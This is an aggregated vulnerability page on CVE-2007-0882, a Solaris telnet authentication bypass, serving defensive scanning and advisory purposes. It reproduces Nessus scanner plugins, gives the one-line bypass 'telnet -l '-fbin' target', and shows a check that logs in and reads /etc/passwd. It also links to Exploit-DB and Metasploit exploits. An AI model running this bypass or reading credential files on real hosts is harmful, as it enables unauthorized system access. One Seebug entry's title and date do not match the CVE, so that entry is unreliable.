Vulnerabilities > CVE-2007-0882 - Argument Injection or Modification vulnerability in multiple products

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
oracle
sun
CWE-88
nessus
exploit available
metasploit
NVD
Published: 2007-02-12
Updated: 2024-11-21

Summary

Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client "-f" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts, as demonstrated by the bin account.

Vulnerable Configurations

Part Description Count
OS
Oracle
2
OS
Sun
2

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Try All Common Application Switches and Options
    An attacker attempts to invoke all common switches and options in the target application for the purpose of discovering weaknesses in the target. For example, in some applications, adding a --debug switch causes debugging information to be displayed, which can sometimes reveal sensitive processing or configuration information to an attacker. This attack differs from other forms of API abuse in that the attacker is blindly attempting to invoke options in the hope that one of them will work rather than specifically targeting a known option. Nonetheless, even if the attacker is familiar with the published options of a targeted application this attack method may still be fruitful as it might discover unpublicized functionality.
  • Using Meta-characters in E-mail Headers to Inject Malicious Payloads
    This type of attack involves an attacker leveraging meta-characters in email headers to inject improper behavior into email programs. Email software has become increasingly sophisticated and feature-rich. In addition, email applications are ubiquitous and connected directly to the Web making them ideal targets to launch and propagate attacks. As the user demand for new functionality in email applications grows, they become more like browsers with complex rendering and plug in routines. As more email functionality is included and abstracted from the user, this creates opportunities for attackers. Virtually all email applications do not list email header information by default, however the email header contains valuable attacker vectors for the attacker to exploit particularly if the behavior of the email client application is known. Meta-characters are hidden from the user, but can contain scripts, enumerations, probes, and other attacks against the user's system.
  • HTTP Parameter Pollution (HPP)
    An attacker overrides or adds HTTP GET/POST parameters by injecting query string delimiters. Via HPP it may be possible to override existing hardcoded HTTP parameters, modify the application behaviors, access and, potentially exploit, uncontrollable variables, and bypass input validation checkpoints and WAF rules.
  • OS Command Injection
    In this type of an attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.

Exploit-Db

  • descriptionSun Solaris Telnet Remote Authentication Bypass Vulnerability. CVE-2007-0882. Remote exploit for solaris platform
    idEDB-ID:16328
    last seen2016-02-01
    modified2010-06-22
    published2010-06-22
    reportermetasploit
    sourcehttps://www.exploit-db.com/download/16328/
    titleSun Solaris Telnet Remote Authentication Bypass Vulnerability
  • descriptionSunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit. CVE-2007-0882. Remote exploit for solaris platform
    fileexploits/solaris/remote/3293.sh
    idEDB-ID:3293
    last seen2016-01-31
    modified2007-02-11
    platformsolaris
    port23
    published2007-02-11
    reporterkingcope
    sourcehttps://www.exploit-db.com/download/3293/
    titleSunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit
    typeremote
  • descriptionSolaris 10, 11 Telnet Remote Authentication Bypass. CVE-2007-0882. Remote exploit for solaris platform
    idEDB-ID:9918
    last seen2016-02-01
    modified2007-02-12
    published2007-02-12
    reporterMC
    sourcehttps://www.exploit-db.com/download/9918/
    titleSolaris 10 / 11 Telnet - Remote Authentication Bypass

Metasploit

descriptionThis module exploits the argument injection vulnerability in the telnet daemon (in.telnetd) of Solaris 10 and 11.
idMSF:EXPLOIT/SOLARIS/TELNET/FUSER
last seen2020-06-13
modified2017-09-08
published2007-02-17
referenceshttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/solaris/telnet/fuser.rb
titleSun Solaris Telnet Remote Authentication Bypass Vulnerability

Nessus

  • NASL familySolaris Local Security Checks
    NASL idSOLARIS10_X86_120069.NASL
    descriptionSunOS 5.10_x86: in.telnetd patch. Date this patch was last updated by Sun : Feb/21/07
    last seen2018-09-01
    modified2018-08-13
    plugin id24342
    published2007-02-14
    reporterTenable
    sourcehttps://www.tenable.com/plugins/index.php?view=single&id=24342
    titleSolaris 10 (x86) : 120069-03
    code
    #%NASL_MIN_LEVEL 80502

# @DEPRECATED@
#
# This script has been deprecated as the associated patch is not
# currently a recommended security fix.
#
# Disabled on 2011/09/17.

#
# (C) Tenable Network Security, Inc.
#
#

if ( ! defined_func("bn_random") ) exit(0);
include("compat.inc");

if(description)
{
 script_id(24342);
 script_version("1.26");

 script_name(english: "Solaris 10 (x86) : 120069-03");
 script_cve_id("CVE-2007-0882");
 script_set_attribute(attribute: "synopsis", value:
"The remote host is missing Sun Security Patch number 120069-03");
 script_set_attribute(attribute: "description", value:
'SunOS 5.10_x86: in.telnetd patch.
Date this patch was last updated by Sun : Feb/21/07');
 script_set_attribute(attribute: "solution", value:
"You should install this patch for your system to be up-to-date.");
 script_set_attribute(attribute: "see_also", value:
"https://getupdates.oracle.com/readme/120069-03");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"metasploit_name", value:'Sun Solaris Telnet Remote Authentication Bypass Vulnerability');
 script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
 script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
 script_set_attribute(attribute:"canvas_package", value:'CANVAS');
 script_cwe_id(94);
 script_set_attribute(attribute:"plugin_publication_date", value: "2007/02/14");
 script_cvs_date("Date: 2019/10/25 13:36:24");
 script_set_attribute(attribute:"patch_publication_date", value: "2007/02/13");
 script_set_attribute(attribute:"vuln_publication_date", value: "2007/02/10");
 script_end_attributes();

 script_summary(english: "Check for patch 120069-03");
 script_category(ACT_GATHER_INFO);
 script_copyright(english:"This script is Copyright (C) 2007-2019 Tenable Network Security, Inc.");
 family["english"] = "Solaris Local Security Checks";
 script_family(english:family["english"]);
 
 script_dependencies("ssh_get_info.nasl");
 script_require_keys("Host/Solaris/showrev");
 exit(0);
}



# Deprecated.
exit(0, "The associated patch is not currently a recommended security fix.");
  • NASL familyGain a shell remotely
    NASL idSOLARIS10_TELNET_ENV.NASL
    descriptionThe remote version of telnet does not sanitize the user-supplied
    last seen2020-06-01
    modified2020-06-02
    plugin id24323
    published2007-02-12
    reporterThis script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/24323
    titleSolaris 10 Forced Login Telnet Authentication Bypass
    code
    #%NASL_MIN_LEVEL 80502
#
# (C) Tenable Network Security, Inc.
#


include("compat.inc");

if (description) {
  script_id(24323);
  script_version("1.32");
  script_cve_id("CVE-2007-0882");
  script_bugtraq_id(22512);

  script_name(english:"Solaris 10 Forced Login Telnet Authentication Bypass");
 
 script_set_attribute(attribute:"synopsis", value:
"It is possible to log into the remote system using telnet without
supplying any credentials" );
 script_set_attribute(attribute:"description", value:
"The remote version of telnet does not sanitize the user-supplied
'USER' environment variable.  By supplying a specially malformed USER
environment variable, an attacker may force the remote telnet server
to believe that the user has already authenticated. 

For instance, the following command :

	telnet -l '-fbin' target.example.com 

will result in obtaining a shell with the privileges of the 'bin'
user." );
 script_set_attribute(attribute:"solution", value:
"Install patches 120068-02 (sparc) or 120069-02 (i386),
which are available from Sun.

Filter incoming to this port or disable the telnet service 
and use SSH instead, or use inetadm to mitigate this 
problem (see the link below)." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"metasploit_name", value:'Sun Solaris Telnet Remote Authentication Bypass Vulnerability');
 script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
 script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
 script_set_attribute(attribute:"canvas_package", value:'CANVAS');
 script_cwe_id(94);
 script_set_attribute(attribute:"see_also", value:"http://lists.sans.org/pipermail/list/2007-February/025935.html" );
 script_set_attribute(attribute:"see_also", value:"http://isc.sans.org/diary.html?storyid=2220" );
 script_set_attribute(attribute:"plugin_publication_date", value: "2007/02/12");
 script_set_attribute(attribute:"patch_publication_date", value: "2007/02/13");
 script_set_attribute(attribute:"vuln_publication_date", value: "2007/02/10");
 script_cvs_date("Date: 2019/10/25 13:36:24");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/o:sun:solaris");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_summary(english:"Attempts to log in as -fbin");
  script_category(ACT_ATTACK);
  script_copyright(english:"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Gain a shell remotely");
  script_dependencie("find_service1.nasl", "openwrt_blank_telnet_password.nasl");
  script_exclude_keys("openwrt/blank_telnet_password");
  script_require_ports("Services/telnet", 23);
  exit(0);
}

include("data_protection.inc");

if (get_kb_item("openwrt/blank_telnet_password")) exit(0, "Ignoring host with an unpassworded OpenWrt Telnet service.");

OPT_WILL        = 0xfb;
OPT_WONT        = 0xfc;
OPT_DO          = 0xfd;
OPT_DONT        = 0xfe;

OPT_SUBOPT      = 0xfa;
OPT_ENDSUBOPT   = 0xf0;

OPT_ENV		= 0x27;

port = get_kb_item("Services/telnet");
if(!port) port = 23;
if(!get_port_state(port))exit(0);


soc = open_sock_tcp(port);
if ( ! soc ) exit(0);

send(socket:soc, data:raw_string(0xff, OPT_WILL, OPT_ENV));

timeout = 5;

while ( TRUE )
{
 counter ++;
 if ( counter > 200 ) break;
 s = recv(socket:soc, length:1, timeout:timeout);
 timeout = 5;
 if ( strlen(s) == 0 ) break; # End of options ?
 if ( ord(s[0]) != 0xff )
	 break;

  else {
	 s = recv(socket:soc, length:2);
	 if ( strlen(s) != 2 ) break;
  	 if ( ord(s[0]) == OPT_DO && ord(s[1]) == OPT_ENV )
	 {
	  send(socket:soc, data:raw_string(0xff, OPT_SUBOPT, OPT_ENV) + raw_string(0,0) + 'USER' + raw_string(1) + '-fbin' + raw_string(0xff, OPT_ENDSUBOPT));
	 }
	 else if ( ord(s[0]) == OPT_DO && ord(s[1]) != OPT_ENV ) send(socket:soc, data:raw_string(0xff, OPT_WONT) + s[1]);
  	 else if ( ord(s[0]) == OPT_WILL ) send(socket:soc, data:raw_string(0xff, OPT_DONT) + s[1]);
 	 else if ( ord(s[0]) == OPT_SUBOPT )
	 {
	  prev = recv(socket:soc, length:1);
          counter2 = 0;
          while ( strlen(prev) && ord(prev[0]) != 0xff && ord(s[0]) != OPT_ENDSUBOPT )
           {
            prev = s;
            # No timeout - the answer is supposed to be cached
            s    = recv(socket:soc, length:1, timeout:0);
            if ( ! strlen(s) ) exit(0);
            counter2++;
            if ( counter2 >= 100 ) exit(0);
	  }
	 }
  	}
}

r = recv(socket:soc, length:4096);
send(socket:soc, data:'id\r\n');
r = recv(socket:soc, length:4096, min:4096);
if ( (uid = egrep(pattern:"uid=", string:r))  )
{
 send(socket:soc, data:'cat /etc/passwd\r\n');
 passwd = recv(socket:soc, length:65535, min:65535);
 passwd = data_protection::redact_etc_passwd(output:passwd);
 report = 'It was possible to log into the remote host as \'bin\' :\n' + uid + '\nThe file /etc/passwd contains :\n\n' + passwd;
 security_hole(port:port, extra:report);
}
  • NASL familySolaris Local Security Checks
    NASL idSOLARIS10_120068.NASL
    descriptionSunOS 5.10: in.telnetd patch. Date this patch was last updated by Sun : Feb/21/07
    last seen2018-09-01
    modified2018-08-13
    plugin id24343
    published2007-02-14
    reporterTenable
    sourcehttps://www.tenable.com/plugins/index.php?view=single&id=24343
    titleSolaris 10 (sparc) : 120068-03

Oval

accepted2007-09-27T08:57:46.156-04:00
classvulnerability
contributors
namePai Peng
organizationOpsware, Inc.
definition_extensions
  • commentSolaris 10 (SPARC) is installed
    ovaloval:org.mitre.oval:def:1440
  • commentSolaris 10 (x86) is installed
    ovaloval:org.mitre.oval:def:1926
descriptionArgument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client "-f" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts, as demonstrated by the bin account.
familyunix
idoval:org.mitre.oval:def:2202
statusaccepted
submitted2007-08-10T12:25:19.000-04:00
titleSecurity Vulnerability in the in.telnetd(1M) Daemon May Allow Unauthorized Remote Users to Gain Access to a Solaris Host
version35

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/82328/fuser.rb.txt
idPACKETSTORM:82328
last seen2016-12-05
published2009-10-28
reporterMC
sourcehttps://packetstormsecurity.com/files/82328/Sun-Solaris-Telnet-Remote-Authentication-Bypass.html
titleSun Solaris Telnet Remote Authentication Bypass

Saint

bid22512
descriptionSolaris telnetd authentication bypass
idpass_solaristelnetbypass
osvdb31881
titlesolaris_telnetd_auth
typeremote

Seebug

bulletinFamilyexploit
description<p>漏洞描述:Solaris是一款由Sun开发和维护的商业性质UNIX操作系统。 Solaris 10的TELNET服务在处理畸形的认证数据时存在漏洞,远程攻击者可能利用此漏洞绕过认证获得访问。 Solaris 10的Telnet守护进程未经检查将用户可能提交的畸形参数直接传递给login进程处理,login进程由此执行非预期的用户身份切换操作。这可能允许用户无需口令便可以某些特权用户权限登录到系统,获得完全的系统访问,如果系统未能对root用户登录位置作限制,获取root用户访问也是可能的。</p><p>CVE-ID:CVE-2007-0882</p><p>CNNVD-ID:CNNVD-200702-224</p><p>CVE官方链接<a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882"><font color="#333333">:</font>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882</a></p><p> 目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接: <a href="http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102802-1" rel="nofollow">http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102802-1</a> </p>
idSSV:18010
last seen2017-11-19
modified2002-01-18
published2002-01-18
reporterRoot
sourcehttps://www.seebug.org/vuldb/ssvid-18010
titleSolaris in.telnetd TTYPROMPT Buffer Overflow

References